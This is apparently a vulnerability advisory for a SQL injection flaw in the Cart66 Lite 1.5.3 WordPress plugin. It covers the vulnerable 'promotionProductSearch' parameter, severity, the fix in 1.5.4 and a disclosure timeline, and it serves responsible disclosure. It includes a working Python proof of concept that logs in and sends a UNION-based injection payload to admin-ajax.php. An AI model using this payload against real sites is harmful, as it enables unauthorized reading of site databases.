Cart66 Lite 1.5.3, SQL Injection
The QSA named ‘q’ for the ‘promotionProductSearch’ AJAX call is not being sanitized, which allows for MySQL injection utilizing a UNION. The user must be logged in for this to be applicable. The output is JSON encoded, however is a pure representation of the data returned from a MySQL query.
Homepage
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.5.4.
Proof of Concept
import requests
s = requests.session()
blog_url = 'http://localhost'
# Login to WordPress
url = '%s/wp-login.php'%blog_url
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
# Trigger our MySQL injection
url = '%s/wp-admin/admin-ajax.php'%blog_url
params = {
"action":"promotionProductSearch",
"q":"' UNION ALL SELECT CAST(DATABASE() AS CHAR),NULL#"
}
r = s.get(url, params=params)
print r.textTimeline
- 2014-12-12: Discovered
- 2014-12-12: Vendor notified
- 2014-12-15: CVE Requested
- 2014-12-16: Vendor responded
- 2014-12-22: 1.5.4 released – issue resolved
- 2014-12-29: Advisory released
- 2015-01-05: CVE Assigned